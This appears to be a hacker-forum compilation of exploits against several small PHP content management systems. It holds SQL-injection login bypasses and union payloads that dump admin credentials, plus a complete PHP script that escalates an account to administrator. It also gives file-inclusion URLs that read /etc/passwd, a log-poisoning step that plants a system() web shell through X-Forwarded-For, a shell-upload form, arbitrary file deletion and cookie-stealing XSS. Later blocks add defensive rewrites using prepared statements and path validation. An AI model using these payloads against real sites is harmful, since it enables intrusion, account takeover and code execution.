SQL inj
/microcms-admin-login.php
PHP:
...if ($i == 0) {
    $sql = ' SELECT * FROM microcms_administrators WHERE administrators_username = "' . $_POST['administrators_username'] . '" and administrators_pass = PASSWORD("' . $_POST['administrators_pass'] . '")';
    $user_result = mysql_query($sql);...
A classic of the genre! POST request: action - "microcms-admin-login.php", text field - "administrators_username", password field - "administrators_pass", hidden field [ name="action" type="hidden" value="admin_login" ]
Result:
field administrators_username = admin
field administrators_pass = 123") or 1=1
Or in the first field - a strange error! We're in! ;-)

SQL inj
/micro_cms_files/cms/revert-content.php - the 3rd field is printable
PHP:
...if ($_GET['type'] == 'newer') {
    $result = mysql_query(' SELECT * FROM microcms_content_blurb_history WHERE content_blurbs_variable = "' . $_GET['id'] . '" and content_blurb_history_version_num = "' . $_GET['version'] . '" ORDER BY content_blurb_history_version_num ASC LIMIT 1');
} elseif ($_GET['type'] == 'older') {...
Result:
http://microcms/micro_cms_files/cms/revert-content.php?id=test_content[SQL]&type=newest
hehe, our admins!
Code:
http://microcms/micro_cms_files/cms/revert-content.php?id=test_content%22+union+select+1,2,group_concat(concat_ws(0x3a,administrators_username,administrators_pass)%20separator%200x40),4,5+from+microcms_administrators--+&type=newest
Forgot: conditions - mg=off
Real examples:
admin" or "admin"="admin" /*
any password
Product: ArtiPHP
Version: 5.0.0 Neo
Author: http://www.artiphp.com/

Blind SQL-Injection.
Need: mq=off.
File: artpublic/utilisateurs/modif_inscription.php
PHP:
$prenom = htmlspecialchars($prenom);
$nom = htmlspecialchars($nom);
$login = htmlspecialchars($login);
$login2 = htmlspecialchars($_POST['login2']);
$site = htmlspecialchars($site);
$url = htmlspecialchars($url);
$ville = htmlspecialchars($ville);
$metier = htmlspecialchars($metier);
$pass = htmlspecialchars($pass);
$pass2 = htmlspecialchars($pass2);
....
if ($pass && $pass2) {
    // ***** MODIF jimro ***** Added $passMD5 and modified the query - 28/10/2005
    $passMD5 = md5($pass);
    $requete = "UPDATE " . ARTI_PREFIX_TB . "utilisateurs SET prenomUtilisateur='$prenom', nomUtilisateur='$nom', passUtilisateur=password('$pass'), passUtilisateurMD5='$passMD5', loginUtilisateur='$login2', siteUtilisateur='$site', urlUtilisateur='$url', villeUtilisateur='$ville', metierUtilisateur='$metier' WHERE id_utilisateur='$SESSION_ID'";
...
Target:
Expl0it:
PHP:
<?php
/**
 * @author m0hze
 * @copyright 2010
 * @{http://forum.antichat.net}
 * @ Yeeeees, baby!
 */
$host = 'target.com'; // URL of the target host, e.g. example.com, don't use / (slash)!
$path = '/'; // Path to target folder
$login = 'YouLogin'; // Enter your login
$password = 'Password?'; // Enter your password
$newpass = 'NewPassword :)'; // This is your new password for your account
$groupid = 1; // Your new GROUPID, 1 = administrator.

function auth($login, $password) // Function auth on site, and get cookie
{
    global $host, $path, $authscript;
    $newpath = $path . 'artpublic/includes/verif_user.php';
    $data = 'login=' . $login . '&pass=' . $password;
    $fp = fsockopen($host, 80);
    fputs($fp, "POST $newpath HTTP/1.1\r\n");
    fputs($fp, "Host: $host\r\n");
    fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
    fputs($fp, "Content-length: " . strlen($data) . "\r\n");
    fputs($fp, "Connection: close\r\n\r\n");
    fputs($fp, $data);
    while (!feof($fp)) {
        $result .= fgets($fp, 128);
    }
    if (stripos($result, "index.php")) {
        preg_match('#Set-Cookie:(.*);#iU', $result, $match);
        //list($name,$value) = explode('=',$match[1]);
        echo ("Authorisation: COMPLETE!...");
        return (trim($match[1]) . ';');
    } else {
        die("Authorisation: FAILED!");
    }
}

function exploit($cookie) // Function exploit, change your group, password.
{
    global $host, $path, $authscript, $newpass, $groupid, $login;
    $newpath = $path . 'artpublic/utilisateurs/modif_inscription.php';
    $data = "prenom=HelloByExploit&nom=HelloByExploit&login2=$login',id_ugroup='".$groupid."',passUtilisateur=PASSWORD('" . $newpass . "'),passUtilisateurMD5='" . md5($newpass) . "'+where+loginUtilisateur='" . $login . "'+--+&login=$login&pass=1234&pass2=1234";
    $fp = fsockopen($host, 80);
    fputs($fp, "POST $newpath HTTP/1.1\r\n");
    fputs($fp, "Host: $host\r\n");
    fputs($fp, "Referer: $referer\r\n");
    fputs($fp, "Cookie: $cookie\r\n");
    fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
    fputs($fp, "Content-length: " . strlen($data) . "\r\n");
    fputs($fp, "Connection: close\r\n\r\n");
    fputs($fp, $data);
    echo '<br>Login: ' . $login;
    echo '<br>Password: ' . $newpass;
}

exploit(auth($login, $password));
?>
Siman!
Product: SiMan CMS 1.5, download here

SQL inj
index.php
PHP:
    ...
    $_getvars=$_GET;
    $_postvars=$_POST;
    $_cookievars=$_COOKIE;
    $_servervars=$_SERVER;
    $_uplfilevars=$_FILES;
    ...
PHP:
    ...
    $module=$_getvars["m"];
    $mode=$_getvars["d"];
    $special['sql']['count']=0;
    if (count($_getvars)==0) $special['is_index_page']=1;
    if (empty($module) || strpos($module, ':') || strpos($module, '.') || strpos($module, '/') || strpos($module, '\\'))...
PHP:
    ...if ($module<>'404') include('modules/'.$module.'.php');...

/modules/account.php
PHP:
    ...
    $modules[$modules_index]["module"]='account';
    $modules[$modules_index]["title"]=$lang["register"];
    $login=$_postvars["p_login"];
    $password=$_postvars["p_password"];
    $password2=$_postvars["p_password2"];
    ...
PHP:
    ...
    $sql="SELECT * FROM ".$tableusersprefix."users WHERE login = '$login'";
    $result=database_db_query($nameDB, $sql, $lnkDB);
    $u=0;
    while ($row=database_fetch_object($result)) {
        if (strcmp($row->login, $login)==0) { $u=1; }
    }
    if ($u!=1) { include('ext/register.php'); }
    if ($u==1)...

Condition: mq=off
durability and result: action="index.php?m=account&d=login", POST method, field login_d [SQL], field passwd_d
We put in: login_d = admin' or 1=1/* (various variations of /*, --, #, ...); there is simply a beta version of the CMS.
We're in!
Real example: http://my-tut.org.ua/index.php?m=account&d=login
    login_d: admin' or 1=1 --
    passwd_d: doesn't matter!
Product: JaF CMS
Version: 4.0
Author: http://jaf-cms.sourceforge.net/

Remote File Inclusion
Need: register_globals = on;
File: /module/forum/main.php
PHP:
    if(isset($category) || isset($id)) { include($website.$main_dir."forum.php"); return;}
    if(!isset($csv_include))require($website.$main_dir."inc/csvfile.php");
    if(!isset($fd))require($website.$main_dir."inc/functions.php");
    ...
Target: http://targethost.com/module/forum/main.php?category=1&id=1&website=http://google.com%00

and:
File: /module/forum/forum.php
PHP:
    if(!isset($csv_include))require($website.$main_dir."inc/csvfile.php");
    if(!isset($fd))require($website.$main_dir."inc/functions.php");
    ?>
    ....

If allow_url_include = off, use this:
Code Exec
File: online.php
PHP:
    if(getenv("HTTP_CLIENT_IP")) {
        $ip = getenv("HTTP_CLIENT_IP");
    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {
        echo 'f';
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    } else {
        $ip = getenv("REMOTE_ADDR");
    }
    ...
    $user_write = fopen("$log_file", "w");
    fputs($user_write , $to_write );
    fclose($user_write );

First step: enter this URL in your browser: http://targethost.com/online.php, and send these headers:
Code:
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: ru,en-us;q=0.7,en;q=0.3
    Accept-Encoding: gzip,deflate
    X-Forwarded-For: <?php system($_GET[sec]); ?>

OK, next step - include the log file.
Target: http://targethost.com/module/forum/main.php?category=1&id=1&website=../files/visitors%00&sec=dir
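The online.php snippet above copies X-Forwarded-For verbatim into a file that a later include() can execute. The following is an added example, not JaF CMS code, of how a visitor logger can record that header without ever writing attacker-chosen bytes to disk; the proxy list and log path are assumptions.

```php
<?php
// Added example, not JaF CMS code. online.php above copies X-Forwarded-For
// straight into a file that a later include() can execute. This version only
// records a syntactically valid address, and only honours the header when the
// direct peer is a configured proxy. The proxy list and log path are assumptions.

const TRUSTED_PROXIES = ['10.0.0.5'];            // assumed reverse proxy
const VISITOR_LOG = '/var/log/cms/visitors.log'; // assumed path, outside the web root

// Pick the client address from $server (the $_SERVER array) without trusting
// forwarded headers from arbitrary peers. Returns null if nothing valid is found.
function clientIp(array $server): ?string
{
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($peer, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    if (in_array($peer, TRUSTED_PROXIES, true) && isset($server['HTTP_X_FORWARDED_FOR'])) {
        // The header may hold "client, proxy1, proxy2"; the first entry is the client,
        // but it is only used if it parses as an IP. "<?php ..." fails that test.
        $first = trim(explode(',', $server['HTTP_X_FORWARDED_FOR'])[0]);
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            return $first;
        }
    }
    return $peer;
}

// Build one log line from validated fields only; the user agent is reduced to
// printable ASCII and length-capped so no header can inject PHP tags or newlines.
function visitorLine(array $server, int $now): ?string
{
    $ip = clientIp($server);
    if ($ip === null) {
        return null;
    }
    $ua = substr(preg_replace('/[^\x20-\x7E]/', '?', $server['HTTP_USER_AGENT'] ?? '-'), 0, 200);
    $ua = str_replace(['<', '>'], ['&lt;', '&gt;'], $ua); // PHP tags can never appear verbatim
    return date('c', $now) . ' ' . $ip . ' ' . $ua . "\n";
}

function logVisitor(array $server): bool
{
    $line = visitorLine($server, time());
    // Append under an exclusive lock instead of fopen(..., "w"), which truncated
    // the file on every request and let one request replace its whole content.
    return $line !== null && file_put_contents(VISITOR_LOG, $line, FILE_APPEND | LOCK_EX) !== false;
}
```

Keeping the log outside the web root, and never passing its path to include(), removes the second half of the chain even if a traversal bug remains elsewhere.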
Honestly, >ashamed to post this< - stone age, but still:
Product: netious-cms-serv-0.4
Site: http://www.netious.com/

SQL inj
/[admin path chosen at installation, hereafter -1-]/index.php
PHP:
    ...
    $result=mysql_query("SELECT AdminId FROM mycmsadmin WHERE username='$username' and password='".sha1($password)."'");
    $row=mysql_fetch_row($result);
    $num_rows = mysql_num_rows($result);
    ...
Result: username: admin' or 1=1--  password: anything!
Inside.

SQL inj
/index.php
PHP:
    ...
    $saction="deny";
    if ($sresult=mysql_query("SELECT Secured FROM pages WHERE PageId='$pageid'")) {
        $srow=mysql_fetch_row($sresult);
    ...
Result:
Code: http://netious/index.php?pageid=1[SQL]
Code: http://netious/index.php?pageid=1'+and+0+union+select+1,version(),3--+
Conditions: register_globals=on, magic_quotes=off

XSS + SQL inj
[-1-]/addtomenuResponse.php
PHP:
    ...
    mysql_query("INSERT into pages VALUES ('','$refid','$name','$thisdescription','$thiskeywords','$alias','0','$pagetype','','$pagesecured')") or die("Something went wrong: <br />".mysql_error());
    ...
include.php
PHP:
    ...
    function commonheader($pageid,$title,$keywords,$description,$forcedid) {
        if ($pageid!="-1" && $pageid!="contact") {
            $result=mysql_query("SELECT Name, Keywords, Description FROM pages WHERE PageId='$pageid'");
            $row=mysql_fetch_row($result);
            $name=$row[0];
            $thiskeywords=$row[1];
            $thisdescription=$row[2];
            if ($forcedid=="no") {$title="$name :: $title";}
            ...
            echo " <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\"> <html xmlns=\"http://www.w3.org/1999/xhtml\"> <head> <title>$title</title>
    ...
Leaky as a sieve.
Product: VarioCMS
Version: 0.5.6
Author: http://sourceforge.net/projects/variocms/

SQL-Inj
Need: mq=off;
File: /plugins/system/slideshow/upload.php
PHP:
    if (isset($_GET['album_id'])) { $album_id = $_GET['album_id']; }
    ....
    $sql_insert = "INSERT INTO " . $db_plugin_prefix . "slideshow (album, albumid, image, thumbnail, position) VALUES ('$album', '$album_id', '$image', '0', '$position')";
    fputs($logfile, "$sql_insert\n");
Target: http://localhost/bugs/VarioCMS/plugins/system/slideshow/upload.php?album=1&album_id=1'{SQL}
Columns: 7

Upload Shell
Need: none.
File: /plugins/system/slideshow/upload.php
PHP:
    if (isset($_GET['album_id'])) { $album_id = $_GET['album_id']; }
    ..
    foreach ($_FILES as $file => $fileArray) {
        echo("File key: $file\n");
        foreach ($fileArray as $item=>$val) { }
        //Let's manipulate the received file: in this demo, we just want to remove it!
        $new_dir = $slideshow_path . $album_id;
        if (file_exists($new_dir) == false) {
            mkdir ($new_dir);
            mkdir ($new_dir . "/fullsize");
            mkdir ($new_dir . "/slideshow");
            mkdir ($new_dir . "/thumbnails");
        }
        $upload_dir = $slideshow_path . $album_id . "/";
        $position = 65000;
        if (move_uploaded_file($fileArray['tmp_name'], $upload_dir . uml2nouml($fileArray['name']))) {
Target:
Expl0it ^_^:
Code:
    <form enctype="multipart/form-data" action="http://targethost.com/plugins/system/slideshow/upload.php?album=1" method="get" >
    <input type="file" name="Filedata" /><input type="submit" />
    <input type="text" name="album_id" value="../../"/>
    </form>
album_id = the folder the shell is uploaded to.
Product: PithCMS
Version: 0.9.5
Author: http://sourceforge.net/projects/pithcms/

Local File Inclusion
File: newsreader.php
Need: rg=on;
PHP:
    include ("admin/lang/$lang");
    include ("_read_config.inc.php");
    include_once ("inc/cleaner.inc.php");
Target: http://targethost.com/newsreader.php?lang=../../../../../../etc/passwd

File: admin/blog.php
Need: logged in on the target site!
PHP:
    session_start();
    if (!isset($_SESSION['user'])) {
        echo "<h2>ACCESS DENIED AND LOGGED</h2>";
        exit;
    }
    ...
    if (isset($_POST['filename'])) {
        //include ("$rootdir/articles/".$_POST['filename']);
        include ("../news/".$_POST['filename']);
    }else{
    ...
Target: {POST} http://targethost.com/admin/blog.php?filename=../../../../../../../../../etc/passwd

Remove arbitrary file
File: admin/download_remove.php
Need: logged in on the target site!
PHP:
    if (isset($_POST['file']) && ($_POST['file'] != "lista.php") && ($_POST['file'] != "index.php") && ($_POST['file'] != "")) {
        $file = trim($_POST['file']);
        $object = ("../downloads/$file");
Target: {POST} http://targethost.com/admin/download_remove.php?file=../indeX.php
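The JaF CMS, VarioCMS and PithCMS posts above all share one defect: a request parameter is glued onto a path and handed to include(), mkdir() or a delete routine, so traversal, URL schemes and a %00 terminator all get through. The following is an added example, not code from any of those projects, of resolving such names against a fixed directory instead; directory names are assumptions.

```php
<?php
// Added example, not code from JaF CMS, PithCMS or VarioCMS. The include(),
// unlink() and mkdir() calls above build a path straight from a request
// parameter, so "../../etc/passwd", "http://..." and a trailing %00 all reach
// the filesystem or a URL wrapper. Directory names here are assumptions.

// Real path of file $name inside $baseDir, or null if it escapes, is missing,
// or is not a bare file name.
function resolveInside(string $baseDir, string $name): ?string
{
    // Refuse NUL explicitly so the check does not depend on PHP's own handling.
    if ($name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    // Bare file name only: no separators, no scheme, no "..". strpos() returns 0
    // for a hit at offset 0, so compare with !== false, never by truthiness.
    if ($name !== basename($name) || strpos($name, '..') !== false) {
        return null;
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $full === false) {
        return null;
    }
    // realpath() collapsed symlinks and ".."; the result must sit strictly below
    // the base directory (the separator rules out a sibling like "/www/langs_x").
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Language file selection replacing include("admin/lang/$lang"): the name must
// match an entry of the directory listing, so traversal and URLs never qualify.
function languageFile(string $langDir, string $lang): ?string
{
    $known = array_filter(scandir($langDir) ?: [], fn($f) => substr($f, -4) === '.php');
    return in_array($lang, $known, true) ? resolveInside($langDir, $lang) : null;
}

// Album directory for uploads replacing $slideshow_path . $album_id: the id is
// required to be digits, so "../../" can never become part of the path.
function albumDir(string $slideshowPath, string $albumId): ?string
{
    if (!ctype_digit($albumId)) {
        return null;
    }
    $dir = rtrim($slideshowPath, '/') . '/' . (int) $albumId;
    return (is_dir($dir) || mkdir($dir, 0750, true)) ? $dir : null;
}
```

resolveInside() also fits the download_remove.php case: a null return means the request names nothing under ../downloads/ and should be rejected rather than passed to the delete.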
MusicBox v3.3

SQL Injection:
/blogs.php?action=edit&newsid=-1+union+select+concat_ws(0x3a,user(),database(),version())+--+
/genre_artists.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7+--+

Passive XSS:
/index.php?in=artist&term=%22%3E%3Csсriрt%3Ealert(document.cookie);%3C/sсriрt%3EE&action=search&start=0&x=0&y=0
/index.php?action=top&show=5&type=Artists+order+by+1+--+%22%3E%3Csсriрt%3Ealert(document.cookie);%3C/sсriрt%3E

Active XSS:
/member.php?uname=<whoever the XSS is to be sent to>, in the comments: <sсriрt>alert(document.cookie);</sсriрt>
In principle, almost every parameter is vulnerable.

/phpinfo.php
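Every SQL injection on this page (ArtiPHP, SiMan, netious, VarioCMS, MusicBox) comes from the same pattern: request values concatenated into the query text, sometimes after htmlspecialchars(), which escapes for HTML and not for SQL. The following is an added example, not code from any of these CMSs, of the same login check and profile update written with bound parameters; table and column names (users, id, login, pass_hash) and the connection details are assumptions.

```php
<?php
// Added example, not code from any CMS on this page. The shared defect above is
// user input spliced into SQL, with htmlspecialchars() mistaken for an SQL
// escape. Table and column names below are assumptions mirroring the snippets.
function db(): PDO
{
    // Credentials are placeholders; load them from config in a real deployment.
    $pdo = new PDO('mysql:host=localhost;dbname=cms;charset=utf8mb4', 'cmsuser', 'secret');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); // real server-side prepares
    return $pdo;
}

// Login check replacing "WHERE login = '$login'" lookups: the input
// "admin' or 1=1--" travels as a bound value and simply matches no row.
function checkLogin(PDO $pdo, string $login, string $password): bool
{
    $stmt = $pdo->prepare('SELECT pass_hash FROM users WHERE login = ?');
    $stmt->execute([$login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // password_verify() replaces the sha1()/md5()/PASSWORD() comparisons.
    return $row !== false && password_verify($password, $row['pass_hash']);
}

// Profile update replacing the ArtiPHP UPDATE: only whitelisted columns are
// set, the group id is never read from the form, and the row is chosen by the
// session user id, so "login2=x',id_ugroup='1'..." stays a harmless string.
function updateProfile(PDO $pdo, int $sessionUserId, array $post): int
{
    $allowed = ['prenom', 'nom', 'site', 'url', 'ville', 'metier'];
    $sets = [];
    $params = [':id' => $sessionUserId];
    foreach ($allowed as $col) {            // $col comes from the whitelist, never from input
        if (isset($post[$col])) {
            $sets[] = "$col = :$col";
            $params[":$col"] = (string) $post[$col];
        }
    }
    if (!empty($post['pass']) && $post['pass'] === ($post['pass2'] ?? null)) {
        $sets[] = 'pass_hash = :pass_hash';
        $params[':pass_hash'] = password_hash($post['pass'], PASSWORD_DEFAULT);
    }
    if ($sets === []) {
        return 0;
    }
    $stmt = $pdo->prepare('UPDATE users SET ' . implode(', ', $sets) . ' WHERE id = :id');
    $stmt->execute($params);
    return $stmt->rowCount(); // htmlspecialchars(..., ENT_QUOTES) belongs at HTML output, not here
}
```

The same output-encoding point covers the XSS entries: values echoed into a page title or a comment get htmlspecialchars() with ENT_QUOTES at the point of output, independent of how the database layer handles them.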